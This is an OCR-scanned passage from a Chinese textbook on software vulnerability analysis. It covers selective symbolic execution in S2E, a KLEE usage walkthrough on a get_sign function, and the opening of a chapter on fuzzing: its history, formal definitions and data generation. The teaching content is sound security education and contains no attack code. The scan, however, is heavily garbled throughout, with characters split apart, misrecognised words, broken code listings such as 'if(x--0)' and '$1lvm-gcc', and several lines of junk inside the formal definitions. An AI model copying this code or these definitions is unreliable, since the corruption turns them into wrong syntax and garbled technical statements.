执行 引擎 新 生成 一 个 分 支 使 测试 过 程 回 退 到 该 代码 执行 前 的 状态 ,在 变量 x 的 约束 条 件 
集合 中 加 入 x 二 0, 并 为 符号 变量 x 重新 求解 得 到 实例 值 ,使 其 能 够 遍历 之 前 不 可 达 的 if 
(x 过 0) 分 支 。 

过 约束 问题 产生 的 根源 有 两 个 : 四 以 上 面 介 绍 的 例子 为 代表 ,因为 符号 变量 的 实例 
化 使 得 符号 执行 分 析 过 程 中 损失 了 对 一 些 路 径 的 可 达 性 ; @ 符 号 变量 实例 化 使 得 分 析 引 
人 擎 无 法 获取 部 分 变量 间 的 约束 表达 式 , 从 而 影响 对 损失 路 径 的 恢复 过 程 。 同 样 以 图 5-37 
中 的 程序 为 例 , 假 设 if (x 二 0) 条 件 分 支 中 的 变量 不 是 x, 而 是 buf, 即 if buf 0) . FELT. 
sysFn(x) 的 返回 值 为 x, 即 buf 二 x, 因 为 对 x 进行 实例 化 操作 时 分 析 引 擎 无 法 获取 buf 一 
x 这 一 关系 表达 式 , 当 程序 执行 到 if(buf 二 0) 分 支 时 ,由 于 条 件 语 句 中 并 不 包含 符号 变 
量 , 所 以 符号 执行 引擎 会 直接 根据 buf 的 值 选择 执行 分 支 ,导致 男 一 个 分 支 不 可 达 。 
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543 关键 问题 及 解决 方案 


上 面 介绍 了 选择 符号 执行 的 基本 思想 及 应 用 实例 ,其 思想 十 分 清晰 ,但 有 两 个 关键 问 
题 需要 解决 : 

(1) 分 析 过 程 由 符号 执行 切换 到 具体 执行 模式 时 ,如 何 解决 过 约束 问题 。 

(2) 从 具体 执行 转换 到 符号 执行 模式 时 ,是 否 需 要 为 符号 变量 添加 约束 条 件 。 

下 面 就 围绕 以 上 两 个 关键 问题 进行 讨论 。 假 设 图 5-38 中 灰色 区 域 的 代码 段 为 分 析 
引擎 的 目标 代码 ,白色 区 域 为 外 部 调用 代码 段 。 目 标 代码 driver 为 系统 内 核 中 的 设备 驱 
动 代码 ,驱动 程序 需要 调用 write usb 函数 从 1/0 端口 读 取 数据 ,还 需要 调用 alloc 函数 
分 配 堆 空 间 。 


























int send_packet(buffer, size) ( 
T packet *pkt; 
2 status = alloc(&pkt, size); - 
3 if ERAI" ) int write usb(pkt) ( 
4  assert(pkt--NULL); if (usb ready) 
sA ^ return do. send(pkt); 
B EI ids return 0; 
s } USBLIB 
7.  if(read port(STATUS)--READY) v — —— — 
8. if (Iwrite usb(pkt)) int alloc (*ptr, size) ( 
9. return FAIL; ^ 
) DRIVER } KERNEL 
(a) Unit (程序 代码 ) (b) Environment (外 部 调用 代码 ) 


图 5-38 分 析 示 例 代码 


1. 过 约束 问题 

S2E 的 符号 执行 引擎 是 基于 KLEE 开发 的 ,也 就 是 说 对 目标 代码 的 符号 分 析 是 程序 
源 代 码 。 对 于 系统 内 核 中 的 代码 (write_usb & alloc) ,不 一 定 能 够 获取 其 源 代码 。 假 设 
能 够 获取 系统 内 核 代码 (Linux) , 则 可 以 进行 下 面 的 分 析 。 

以 图 5-38 中 的 代码 为 例 , 当 driver 调用 write usb 函数 时 ,S2E 切换 到 单 路 径 执行 模 
式 ,但 因为 已 知 write usb 的 源 代码 ,所 以 这 里 可 进行 混合 符号 执行 分 析 , 首 先 根据 变量 
pkt 的 具体 值 执行 代码 ,同时 对 该 执行 路 径 进 行 符号 化 分 析 ( 将 输入 变量 pkt 符号 化 ) ,将 
执行 路 径 上 的 所 有 分 支 条 件 都 进行 记录 并 放 和 人 工作 列表 ,但 并 不 马上 进行 探索 。write_ 
usb 函数 执行 结束 后 不 仅 会 返回 给 send. packet 具体 值 ,还 有 由 输入 参数 pkt 表示 的 返回 
值 符号 表达 式 , 这 里 返回 符号 表达 式 主要 为 了 解决 类 似 buf — x 造成 的 路 径 损失 问题 。 如 
JE send. packet 中 的 所 有 路 径 都 可 达 , 则 舍弃 工作 队列 中 的 所 有 状态 不 再 分 析 , 若 某 条 路 
径 分 支 因 为 write_usb 函数 的 返回 值 或 者 pkt 的 实例 化 而 不 可 达 , 则 需要 从 工作 队列 中 
取出 分 支 状 态 进行 遍历 ,直到 使 当前 路 径 可 达 为 止 。 虽 然 该 解决 方案 有 一 定 的 概率 需要 
对 外 部 代码 进行 遍历 ,但 相对 于 直接 的 全 路 径 遍 历 ,该 方案 已 经 在 效率 上 有 了 很 大 的 
提升 。 

当 已 知 外 部 调用 函数 的 源 代码 时 能 够 完全 解决 该 问题 ,如 果 无 法 获取 源 代码 呢 ? 研 
究 人 员 的 解决 方案 是 将 外 部 函数 的 返回 值 符号 化 。 在 上 例 中 , 当 alloc 函数 返回 时 ,将 其 
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返回 值 符号 化 为 Xret, 同 时 将 alloc 函数 的 输入 参数 ptr 符号 化 。 继 续 执 行 send_packet 
程序 ,因为 没有 限定 符号 Aret 的 取 值 ,其 可 以 为 任何 值 ,因此 所 有 依赖 于 alloc 函数 返回 
值 的 分 支 都 可 以 被 执行 到 ,同时 分 析 引 擎 也 不 用 对 alloc 内 的 代码 进行 分 析 。 这 样 的 解决 
方案 看 似 完美 ,但 又 引入 了 新 的 问题 ,对 alloc 的 返回 值 Aret 而 言 , 其 可 能 无 法 被 实例 化 
为 任意 值 ,这 样 driver 中 的 某 些 由 Aret 决定 的 分 支 可 能 根本 就 不 可 达 , 因 此 会 造成 分 析 
引擎 的 一 些 误 报 。 另 外 需要 注意 的 是 , 当 分 析 引 擎 进入 status— — FALL 分支 时 ,需要 为 
符号 变量 Aret 变量 添加 约束 ,同时 在 路 径 条 件 中 加 入 Aret — FAIL > pkt 一 null 的 约束 条 
件 , 保 证 路 径 分 析 过 程 中 约 东 条件 的 完整 性 。 

2. 约束 条 件 添 加 问题 

如 果 分 析 是 从 目标 代码 段 开 始 的 , 即 从 符号 执行 模式 开始 程序 分 析 , 则 每 个 与 send_ 
packet 输入 参数 相关 的 变量 x, 都 会 被 符号 化 ,并 拥有 对 应 的 约束 条 件 。 当 外 部 调用 函数 
将 x 作为 输入 参数 时 ,分 析 引 擎 首先 对 其 进行 实例 化 。 当 函数 调用 返回 时 ,S2E 重新 将 
xi 变量 符号 化 ,并 为 其 添加 约束 条 件 。 如 果 外 部 函数 代码 已 知 , 则 可 以 对 外 部 函数 的 运 
行 过 程 进 行 混合 符号 分 析 , 函数 返回 时 可 以 为 x, 变量 添加 全 局 的 约 东 条件; 如果 外 部 函 
数 代码 未 知 , 则 将 符号 变量 实例 化 前 的 约束 条 件 赋予 xio 

如 果 分 析 是 从 单 路 径 具 体 模 式 开 始 的 ,如 图 5-39 所 示 , 并 且 无 法 获取 appFn 中 的 代 
码 ,在 对 变量 进行 符号 化 时 S2E 就 无 法 提供 约束 条 件 ; 如 果 appFn 的 源 代 码 已 知 , 则 可 对 
调用 libFn 前 的 代码 进行 混合 符号 执行 分 析 , 当 需要 符号 化 的 变量 x, 与 输入 参数 相关 时 ， 
可 以 为 其 提供 约束 条 件 。 





真实 执行 
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图 5-39 约束 条 件 添加 示例 


通过 本 节 对 于 选择 符号 执行 技术 基本 思想 和 关键 问题 的 介绍 ,相信 读者 已 经 了 解 了 
该 技术 的 基本 原理 。 但 在 具体 实现 时 还 会 遇 到 许多 工程 性 问题 , 感 兴趣 的 读者 可 以 阅读 
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S2E 的 源 代码 进行 深入 理解 和 学 习 。 
5.5 符号 执行 应 用 实例 


551 KLEE 


前 面 章 节 已 经 对 KLEE 的 功能 进行 了 介绍 ,这 里 为 了 方便 读者 理解 和 学 习 其 工作 步 
又 ,本 节 对 其 系统 结构 和 使 用 实例 进行 说 明 。 

图 5-40 是 KLEE 的 基本 架构 ,其 工作 流程 为 : 首先 使 用 LLVM 对 C 程序 的 源 代码 
进行 编译 ,生成 字 节 码 (LLVM 字 节 码 ) ,并 将 字 节 码 交 给 KLEE。 在 测试 程序 开始 运行 
前 ,KLEE 首先 对 程序 的 输入 变量 (函数 参数 ,文件 ,网 络 数据 ) 进 行 符号 化 。 程 序 开始 运 
行 后 ,KLEE 监控 每 条 LLVM 指令 用 以 更 新 符号 变量 状态 , 当 程 序 执行 到 受 符号 变量 控 
制 的 条 件 语句 时 ,KLEE 使 用 约束 求解 器 (STP 求解 器 ) 对 条 件 语句 的 两 个 分 支 的 可 达 性 
进行 判断 ,即使 用 STP 对 路 径 条 件 约束 进行 求解 ,如 果 两 个 分 支 都 可 达 , 则 KLEE 选择 一 
条 分 支 继续 执行 ,同时 为 另外 一 个 分 支 生成 对 应 的 运行 状态 结构 并 放 入 工作 队列 。 状 态 
结构 中 包括 程序 执行 到 该 分 支 时 的 基本 状态 ,如 寄存 器 信息 、 堆 栈 信息 等 ,这 些 信息 都 是 
为 了 KLEE 下 一 轮 选 择 探索 该 分 支 时 能 够 快速 地 恢复 程序 运行 状态 。 当 一 次 探索 过 程 
完成 后 ,KLEE 会 根据 路 径 搜索 算法 从 工作 队列 中 选择 下 一 轮 需要 探索 的 状态 结构 ,直到 
工作 队列 中 没有 状态 为 止 。 假 设 在 当前 的 执行 路 径 上 遇 到 了 一 个 程序 异常 ,KLEE 根据 
当前 路 径 上 的 条 件 约束 ,判断 是 否 有 可 行 的 测试 用 例 与 该 异常 相对 应 ,如 果 路 径 约 束 有 
解 , 则 KLEE 提示 用 户 发 现 了 一 个 新 的 程序 异常 ,以 上 就 是 KLEE 的 完整 工作 过 程 。 
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图 5-40 KLEE 架构 图 
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552 应 用 实例 


KLEE、LLVM 及 STP 的 安装 过 程 读者 可 按照 官方 文档 进行 ,这 里 不 再 蒙 述 。 该 用 
例 主要 用 来 说 明 使 用 KLEE 测试 程序 时 的 主要 步骤 ,下 面 有 一 个 简单 的 函数 : 
int get sign(int x){ 
if(x--0) 


return 0; 


if(x«0) 
return -1; 
else 
return 1; 


) 
1. 输入 变量 符号 化 
为 了 测试 目标 函数 ,KLEE 首先 对 函数 输入 参数 进行 符号 化 ,这 一 个 过 程 在 源 代码 层 
完成 ,如 下 所 示 , 在 调用 get sign 函数 前 插入 klee_make_symbolic() 函 数 , 函 数 中 3 个 参 
数 分 别 为 变量 的 地 址 、 变 量 的 大 小 、 变 量 名 称 (任意 符合 命名 规则 的 字符 串 )。 
int main(){ 
int a; 
klee make symbolic(&a, sizeof (a),"a"); 
return get sign(a); 
) 
2. 程序 编译 
因为 KLEE 的 符号 执行 过 程 运行 于 LLVM 码 之 上 ,所 以 测试 程序 前 需要 先 用 llvm- 
gcc 将 源码 编译 成 LLVM 码 ,假设 程序 名 为 get sign. c, 运 行 如 下 指令 : 
$1lvm-gcc --emit-llvm -c -g get sign.c 
命令 执行 后 会 生成 get_sign. o 文件 ,命令 行 中 的 -g 选项 是 为 了 在 编译 的 时 候 将 调试 
信息 添加 到 文件 中 ,KLEE 使 用 调试 信息 才能 够 对 文件 细 化 到 行 一 级 别 的 分 析 , 另 外 需要 
注意 的 是 编译 时 不 添加 任何 优化 选项 。 
3. 运行 KLEE 
在 文件 get sign. o 上 运行 KLEE: 
$klee get sign.o 


命令 执行 后 会 看 到 下 面 的 输出 信息 (LLVM 2. 8): 


KLEE: output directory= "klee- out- 0" 


KLEE: done: total instructions- 51 
KLEE: done: completed paths-3 
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KLEE: done: generated tests=3 


函数 中 总 共有 3 RI, x==0,x<0 Bx. EHHH zs UL] KLEE 已 经 遍 


历 了 函数 中 的 所 有 路 径 ,并 为 每 条 路 径 都 生成 了 对 应 的 测试 用 例 。KLEE 运行 后 生成 的 
文件 夹 为 klee-out-0, 其 中 包含 了 生成 的 所 有 测试 用 例 。 如 果 再 次 运行 KLEE, 将 生成 
klee-out-1 文件 夹 , 同 时 生成 一 个 符号 链接 klee-last 指向 新 生成 的 klee-out-1 XEK 


$1s klee- last/ 


assembly.11 run.istats test000002.ktest 
info run.stats test000003.ktest 
messages.txt test000001.ktest warnings.txt 

4. 测试 用 例 


KLEE 生成 的 测试 用 例 的 扩展 名 为 . ktest, 类 型 为 二 进 制 文件 ,可 以 使 用 ktest-tool 


对 其 进行 读 取 。 下 面 分 析 上 面 生成 的 3 个 用 例 : 


$ktest- tool --write- ints klee- last/test000001.ktest 
ktest file :'klee- last/test000001.ktest' 

args i['get sign.o'] 

num objects:l 

object 0 :name:'a" 

object 0 :size:4 

object 0 :data:l 


$ktest- tool --write- ints klee- last/test000002.ktest 
object 0 :data:- 2147483648 
$ktest- tool --write- ints klee- last/test000003.ktest 


object 0 :data:0 


可 以 看 到 ,每 个 用 例 中 定义 了 测试 程序 的 参数 符号 (name) 、 符 号 变量 的 大 小 (size) 及 


取 值 (data)。3 个 用 例 中 的 取 值 对 应 到 了 函数 的 3 条 路 径 ,说 明了 KLEE 在 测试 简单 程 
序 时 的 有 效 性 和 完整 性 。 对 复杂 程序 或 者 GNU 核心 组 件 的 测试 可 以 参考 官方 文档 进行 
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模糊 测试 


模糊 测试 是 一 种 通过 提供 非 预期 输入 ,并 监视 目标 软件 在 处 理 该 输入 后 是 否 出 现 异 
常 的 软件 动态 分 析 方法 ,被 广泛 应 用 于 软件 漏洞 挖掘 的 研究 与 实践 工作 中 。 模 糊 测试 可 
以 帮助 软件 测试 人 员 与 软件 安全 分 析 人 员 摆 脱 对 源 代 码 的 依赖 ,并 能 减少 程序 编译 优化 、 
代码 混淆 对 程序 二 进 制 代码 分 析 的 不 利 影响 。 模 糊 测试 方法 根据 测试 目标 的 软件 或 硬件 
形态 .运行 环境 .通信 接口 的 差异 以 及 测试 分 析 目 的 的 不 同 存在 较 大 的 差异 。 本 章 试图 从 
模糊 测试 的 基本 思想 和 人手 ,介绍 模糊 测试 的 一 些 共 性 特征 与 典型 案例 。 

本 音 的 内 容 包括 概述 ` 基 本 原理 与 组 成 .基础 方法 与 技术 .模糊 测 试 优化 方法 、 分 布 式 
模糊 测试 、 典 型 工具 与 案例 6 个 部 分 。 


6.1 概 述 


验证 软件 的 安全 性 有 两 种 方法 : 其 一 为 形式 化 证 明 的 方法 ,利用 形式 化 证 明 的 完备 
性 验证 软件 的 安全 性 ;其 二 为 测试 分 析 的 方法 ,通过 穷 举 所 有 可 能 的 状态 与 状态 转移 过 程 
验证 软件 的 安全 性 。 随 着 软件 功能 复杂 性 与 代码 规模 的 急剧 增加 ,形式 化 证 明 的 方法 已 
经 难以 在 代码 层级 上 得 到 应 用 ,而 以 模糊 测试 为 代表 的 软件 测试 方法 在 软件 安全 性 分 析 
中 得 到 了 广泛 的 应 用 。 使 用 模糊 测试 发 现 软件 漏洞 ,其 关键 在 于 构建 并 执行 大 量 不 同 的 
动态 执行 过 程 。 这 一 问题 需要 通过 构建 大 量 不 同 的 输入 并 自动 执行 测试 软件 来 解决 ,这 
也 是 模糊 测试 需要 解决 的 核心 问题 。 

模糊 测试 的 起 源 可 以 追溯 到 1989 年 ,Barton Miller 教授 在 其 高 级 操作 系统 课 上 开发 
了 一 款 原始 的 模糊 器 ,用 于 测试 UNIX 应 用 程序 的 健壮 性 ,其 使 用 了 最 简单 的 生成 随机 
字符 串 的 方法 , 却 有 效 地 改进 了 setuid 应 用 程序 可 靠 性 ,但 当时 并 未 提出 模糊 测试 的 概 
念 。 直 到 1999 年 ,Oulu 大 学 开始 进行 PROTOS 测试 集 的 开发 工作 ,通过 分 析 协 议 规约 ， 
产生 违背 规约 的 报 文集 合 ,将 这 些 报 文 用 于 测试 多 个 供应 商 的 产品 ,这 种 方法 逐渐 成 熟 ， 
也 发 现 了 大 量 的 故障 ,标志 着 模糊 测试 发 展 的 一 个 重要 里 程 碑 。2002 年 ,Dave Aitel 发 
fü f SPIKE 这 款 开源 的 模糊 器 ,用 于 测试 基于 网 络 的 应 用 程序 ,而 文件 模糊 测试 也 在 
2004 年 开始 兴起 ,包括 FileFuzz 和 SPIKEfile 等 代表 工具 。 

模糊 测试 与 源 代码 审查 是 发 现 软件 漏洞 最 多 的 两 种 方法 ,与 源 代码 审查 相 比 ,模糊 测 
试 具有 许多 优势 。 首 先 ,模糊 测试 不 需要 源 代码 的 支持 ,是 第 三 方 安全 研究 者 分 析 非 开源 
的 商业 软件 安全 性 的 重要 的 基础 性 分 析 方 法 。 其 次 ,模糊 测试 会 利用 大 量 畸 形 数 据 对 软 
件 进行 测试 ,能 够 发 现 软件 隐蔽 的 脆弱 性 与 漏洞 ,而 这 些 漏 洞 一 般 来 源 于 开发 者 的 思维 定 
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势 ,并 且 在 单元 测试 .模块 测试 等 多 轮 测试 中 都 没有 被 发 现 。 最 后 ,模糊 测试 过 程 通过 实 
际 执行 的 方式 分 析 软 件 行为 ,能 够 有 效 地 避免 非 直接 跳 转 、 代 码 混 清 等 因素 的 干扰 ,同时 
也 能 够 发 现 软 件 在 编译 过 程 中 产生 的 漏洞 。 模 糊 测 试 的 这 些 特点 使 其 帮助 程序 员 在 
20 世纪 已 经 发 现 了 大 量 的 软件 漏洞 , 现 已 成 为 软件 漏洞 挖掘 领域 的 基础 性 工具 。 随 着 软 
件 安全 开发 得 到 广泛 的 重视 ,软件 存在 的 漏洞 也 更 加 隐藏 ,同时 软件 的 规模 与 功能 复杂 度 
急剧 增加 ,漏洞 挖掘 的 难度 也 逐步 增加 。 在 此 背景 下 ,模糊 测试 方法 需要 利用 其 他 软件 分 
析 方 法 的 优势 ,克服 自身 存在 的 缺陷 。 

使 用 模糊 测试 进行 挖掘 漏洞 面临 数据 样本 空间 大 、 等 价 测试 用 例 多 、 漏 洞 判定 困难 、 
测试 对 象 运行 环境 差异 显著 等 难题 。 模 糊 测 试 数据 样本 空间 大 ,使 用 穷 举 法 进行 遍历 耗 
时 太 多 ,而 各 种 抽样 的 方法 又 容易 导致 执行 路 径 的 踪 漏 ,这 是 模糊 测试 也 是 动态 分 析 面 临 
的 首要 困难 。 等 价 测试 用 例 多 ,主要 体现 在 大 量 不 同 的 测试 数据 对 应 相同 的 程序 执行 路 
径 ,导致 持续 性 地 未 发 现 异 常 或 者 发 现 大 量 相同 的 异常 类 型 ,这 也 是 模糊 测试 效率 的 主要 
瓶颈 。 漏洞 判定 困难 ,难以 采用 统一 的 模式 对 软件 漏洞 进行 描述 ,除了 内 存 溢出 、 内 存 违 
规 访 问 等 具有 相似 特征 的 底层 设计 与 实现 问题 导致 的 漏洞 外 ,越权 访问 .内 置 后 门 等 软件 
设计 与 实现 引起 的 逻辑 漏洞 的 原因 、 机 理 与 后 果 差 别 很 大 ,这 也 是 利用 模糊 测试 发 现 软件 
漏洞 迫切 需要 解决 的 难点 之 一 。 测 试 对 象 运 行 环境 差异 显著 ,主要 指 测试 对 象 运行 所 需 
的 硬件 驱动 .函数 库 等 资源 以 及 与 环境 交互 的 输入 输出 接口 十 分 复杂 并 且 多 样 ,导致 模糊 
测试 过 程 中 与 测试 对 象 进行 数据 交互 、 监 控 测 试 对 象 运行 状态 十 分 困难 。 针 对 模糊 测试 
面临 的 难点 和 局 限 性 ,通常 通过 结合 其 他 方面 的 方法 和 技术 进行 弥补 ,提高 模糊 测试 系统 
的 能 力 和 效率 。 


6.2 基本 原理 与 组 成 


本 节 首 先 介 绍 模糊 测试 的 基本 原理 ,分 析 模 糊 测 试 思想 的 可 行 性 ,然后 进一步 介绍 模 
糊 测试 系统 的 架构 组 成 ,分 析 架 构 中 每 个 模块 的 功能 和 面临 的 问题 ,最 后 介绍 模糊 测试 的 
工作 模式 及 不 同 工 作 模式 下 的 系统 架构 。 


621 基本 原理 


模糊 测试 的 思想 是 构造 所 有 可 能 的 输入 ,并 将 输入 传递 给 被 测 目标 程序 ,然后 监控 目 
标 程 序 在 接收 输入 后 是 否 出 现 异常 情况 ,以 此 来 发 现 软 件 中 存在 的 缺陷 和 故障 。 大 型 程 
序 的 复杂 性 使 得 软件 开发 者 很 难 全 面 考虑 所 有 异常 情况 并 做 出 正确 的 处 理 ,而 且 程 序 可 
能 由 多 个 开发 者 甚至 多 个 开发 团队 共同 完成 .再 考虑 到 开发 周期 压力 等 外 界 因素 ,更 是 加 
大 了 处 理 所 有 可 能 输入 的 难度 。 模 糊 测 试 抓 住 了 程序 开发 的 痛 点 ,通过 构造 出 软件 开发 
者 预期 之 外 的 畸形 输入 ,以 此 来 发 现 目标 软件 的 脆弱 性 。 

在 程序 分 析 中 ,不 同 场景 下 某 些 概念 会 有 细微 的 区 别 , 为 了 下 面 讨论 方便 ,在 本 节 先 
对 一 些 基 本 概念 做 出 约定 。 

模糊 测试 : 可 以 表示 为 集合 Z= (z) Hp < 为 模糊 测试 实例 。 

模糊 测试 实例 : 为 一 个 二 元 组 z— (OD. +) ,其 中 DD 为 输入 数据 的 集合 {di edo rd, 
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1 为 模糊 测试 实例 对 应 的 程序 状态 及 状态 转移 过 程 ,也 就 是 程序 指令 序列 以 及 对 应 的 内 
存 与 寄存 器 状态 ,在 不 引起 歧义 的 前 提 下 ,为 了 方便 起 见 ,在 本 章 中 可 以 将 : 称 为 程序 执 
行路 径 。 

程序 执行 路 径 : 表示 为 :一 二 S, 一 ,二 ,其 中 SS {s ,5 ,…,s,) 为 一 个 全 序 集 ,s 可 以 称 
为 执行 状态 ,一 ,为 定义 在 S 上 的 偏 序 关系 ,一 ,在 指令 上 的 投影 就 是 指令 间 的 支配 关 
系 一 ,所 有 程序 执行 路 径 的 集合 包含 程序 全 部 的 行为 。 

执行 状态 ; 表示 为 ;二 (c,M) ,其 中 < 为 二 进 制 指令 ,M 为 内 存 与 寄存 器 状态 的 集合 ， 
在 实际 工作 中 一 般 以 受到 c 影响 的 内 存 与 寄存 器 状态 的 集合 M' 近似 , 即 MCM, 

输入 数据 , ARH d= Co cond) ,其 中 v 为 输入 数据 的 取 值 ,cond 为 数据 输入 的 条 
件 ,cond 一 般 为 程序 的 网 络 输出 或 窗口 输出 。 

程序 异常: 表示 为 。, 指 一 种 特殊 的 程序 执行 状态 ,该 状态 没有 后 续 状态 ,此 时 程序 的 
执行 流 已 经 进入 操作 系统 的 异常 处 理 流程 ,或 者 已 经 非 正常 终止 。 

异常 执行 路 径 : 表示 为 6., 指 其 对 应 的 程序 执行 状态 集合 S 包含 程序 异常 。。 

等 价 执行 路 径 ; 车 程序 执行 路 径 4 在 指令 上 的 投影 C 一 (ci ,cs ,sc ) 相 等 , 则 可 以 把 
这 些 程序 执行 路 径 称 为 等 价 执行 路 径 7 二 {1 ETI ~ CT, 其 中 一 为 程序 执行 路 径 的 等 
价 关系 。 

测试 用 例 集合 : 表示 为 D ,是 输入 数据 空间 的 一 个 子 集 ,一 般 来 说 ,测试 用 例 集合 上 
定义 了 一 个 偏 序 ->, ,表示 在 模糊 测试 过 程 中 测试 用 例 DED 的 执行 顺序 。 

测试 用 例 序号 , 测试 用 例 D 的 序号 k= ‖ (DID D)} | € 0.95. 

程序 执行 过 程 , 在 D 的 描述 足够 全 面 , 并 且 程 序 的 行为 与 时 间 . 调 度 等 潜在 因素 无 关 
的 情况 下 ,对 于 同一 个 p, 其 对 应 的 程序 执行 路 径 4 是 唯一 的 ,此 时 程序 执行 过 程 p 可 以 
视 作 测试 用 例 D 到 程序 执行 路 径 4 的 映射 。 

异常 测试 用 例 : 表示 为 D,, 指 一 个 测试 用 例 D,p(D) 二 4., 全 部 异常 测试 用 例 的 集合 
YD.. 

等 价 测试 用 例 , e D AR RA i OE FLBUT MO 108 S o] DRE AERE TR REG 
的 情况 下 ,可 以 将 程序 执行 路 径 作为 测试 用 例 的 像 , 即 对 于 一 个 确定 的 D, 有 且 只 有 一 个 
唯一 的 :与 之 对 应 ,此 时 等 价 执行 路 径 7 也 对 应 着 等 价 测试 用 例 万 。 

模糊 测试 的 目标 根据 应 用 场景 的 不 同 而 存在 细微 区 别 ,对 于 软件 测试 更 加 注重 测试 
用 例 的 覆盖 率 ,对 漏洞 发 据 则 更 加 注重 快速 地 发 现存 在 漏洞 的 软件 执行 路 径 。 在 实际 使 
用 中 比较 常用 的 描述 测试 用 例 覆 盖 率 的 方式 是 路 径 覆盖 率 ,此 外 还 有 指令 覆盖 率 MAIS 
CERO 覆盖 率 . 条 件 覆 盖 率 等 方式 。 对 于 测试 用 例 集合 D ERBERK /一 
LODIEDDTELL, tes T — toe Moss On T BENE OEEIH AUN 
MH BL B 8E e CAE BRI RU T b t M RUE DRAUF BE E ERT 
uoo," LDLEDDPAE TT, spp rei tory pH JUN E T Dk 


气 软 件 漏洞 ,此 时 测试 用 例 集 合 与 测试 用 例 的 执行 顺序 都 会 影响 漏洞 挖掘 的 速度 ,因此 需 
要 引入 一 个 新 的 指标 一 一 首次 命中 轮 数 六 一 inf(&A| D, € D. DEG WE 
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模糊 测试 需要 构造 合适 的 输入 ,然后 强制 目标 接收 输入 数据 ,并 观测 目标 的 反应 , 同 
时 需要 批量 和 自动 化 地 进行 测试 来 提高 测试 速度 。 一 般 来 说 ,模糊 测试 分 为 测试 数据 生 
成 .数据 交互 与 控制 ,测试 结果 反馈 3 个 阶段 。 测 试 数 据 生成 过 程 主 要 通过 各 种 策略 , 依 
据 网 络 协议 或 文件 格式 生成 各 种 类 型 的 输入 数据 ,并 组 装 成 网 络 数据 包 、 磁 盘 文 件 等 数据 
实体 ;数据 交互 与 控制 过 程 利 用 网 络 .测试 环境 与 测试 对 象 通 过 网 络 数据 包 与 磁盘 文件 等 
形式 进行 数据 交互 ,并 控制 程序 执行 过 程 ;测试 结果 反馈 过 程 监控 程序 执行 过 程 中 的 程序 
状态 ,判断 程序 是 否 出 现 异 常 或 崩溃 ,然后 获取 现场 状态 ,还 可 以 做 一 些 后 续 处 理 。 

根据 模糊 测试 的 一 般 过 程 ,可 以 将 模糊 测试 系统 划分 成 3 个 模块 : 数据 生成 模块 、 环 
境 监 控 模 块 和 状态 监控 模块 ,如 图 6-1 所 示 。 数 据 生成 模块 按照 一 定 的 策略 生成 构造 测 
试用 例 ,这 些 测 试用 例 可 能 部 分 符合 规范 的 输入 ,部 分 违反 规范 输入 格式 ;环境 控制 模块 
主要 负责 将 数据 生成 模块 生成 的 数据 传递 给 测试 对 象 并 控制 测试 对 象 的 运行 ;状态 监控 
模块 负责 监控 测试 对 象 的 执行 状态 ,得 到 的 运行 状态 可 以 作为 反馈 指导 数据 生成 模块 的 
测试 用 例 生 成 过 程 。 
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图 6-1 模糊 测试 系统 架构 


1. 数据 生成 模块 

数据 生成 模块 负责 按照 一 定 的 策略 批量 生成 测试 用 例 ,策略 包含 数据 的 语法 格式 与 
数据 生成 方法 。 数 据 的 语法 格式 描述 了 数据 如 何 被 组 装 成 网 络 数据 包 或 一 个 文件 , 它 的 
具体 形式 可 能 是 对 网 络 数据 包 的 每 个 字段 的 严格 定义 ,也 可 能 是 一 个 种 子 文件 的 语法 描 
述 与 部 分 字段 变异 的 方式 。 对 数据 格式 每 个 字段 进行 严格 定义 ,适用 于 网 络 协议 等 格式 
相对 简单 的 情况 ,而 对 复杂 的 文件 格式 进行 描述 一 般 采 用 种 子 文件 与 部 分 字段 语法 描述 
的 方式 。 数 据 生 成 方法 包含 字段 数据 的 生成 策略 与 字段 数据 的 组 合 策略 ,根据 语法 格式 
生成 测试 数据 。 对 于 一 般 字 段 ,数据 生成 方法 根据 字段 长 度 确定 取 值 范围 ,并 在 此 范围 内 
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选取 有 代表 性 的 值 作为 测试 数据 ;对 于 取 值 受到 约束 的 字段 ,如 校 验 和 字段 , 则 按照 约束 
生成 测试 数据 ;对 于 取 值 受到 运行 时 状态 影响 的 数据 ,如 TCP 协议 握手 过 程 数据 包 , 则 需 
要 根据 返回 的 数据 包 来 确定 取 值 。 

为 了 尽 可 能 覆盖 程序 所 有 可 能 的 执行 路 径 , 最 简单 粗暴 的 思想 是 穷 举 所 有 的 输入 情 
况 。 在 密码 学 的 发 展 历程 中 ,经 验 告诉 人 们 , 密 钥 空间 足够 大 的 情况 下 穷 举 破解 是 不 现实 
的 ,2”* 的 输入 空间 即使 消耗 全 球 计 算 资 源 也 难以 在 百年 内 实现 穷 举 ,而 这 仅仅 需要 
4096b, 即 512B 的 输入 ,对 于 软件 的 输入 ,以 文件 输入 为 例 , 少 则 几 千 字 节 ,多 则 数 兆 字 
节 , 穷 举 是 不 现实 的 办 法 。 模 糊 测 试 在 数据 生成 阶段 根据 测试 对 象 的 特点 采用 有 针对 性 
的 策略 生成 数据 ,以 期 在 降低 输入 样本 空间 的 大 小 的 同时 提高 程序 执行 路 径 的 覆盖 率 和 
代码 覆盖 率 , 这 些 策 略 包 括 : 针对 大 规模 输入 采用 基于 种 子 输入 的 部 分 字段 变异 策略 , 针 
对 复杂 数据 结构 采用 复合 类 型 数据 生成 策略 ,针对 复杂 的 数据 交互 方式 采用 多 阶段 交互 
类 型 数据 生成 策略 ,详细 内 容 将 在 6.3. 1 节 进 行 介绍 。 

数据 生成 模块 另 一 个 需要 克服 的 困难 是 测试 对 象 存在 差异 导致 输入 数据 通用 性 较 
差 , 例 如 文件 输入 不 能 作为 网 络 输入 ,不 同 的 文件 格式 不 能 共用 数据 格式 。 针 对 这 一 问 
题 ,市 面 上 诞生 了 专门 针对 某 一 款 软件 或 者 某 一 项 网 络 协议 的 模糊 测试 工具 ,如 FTP 
FUZZ; 同 时 也 诞生 了 支持 数据 格式 定义 的 模糊 测试 系统 ,如 Peach, Sulley 等 。 有 针对 性 
的 模糊 测试 工具 其 实 是 对 输入 的 数据 格式 进行 了 预定 义 ,使 用 简单 ,但 通用 性 和 可 扩展 性 
较 弱 ,难以 应 对 数据 格式 的 更 新 与 变化 ;支持 输入 配置 的 模糊 测试 系统 将 由 用 户 自 定义 数 
据 语 法 格式 ,使 用 较为 复杂 ,需要 用 户 花 费 较 多 时 间 学 习 工 具 的 使 用 与 配置 规则 ,也 需要 
用 户 学 习 挖掘 对 象 的 输入 格式 ,但 可 扩展 性 好 ,支持 的 测试 对 象 面 广 。 

2. 环境 控制 模块 

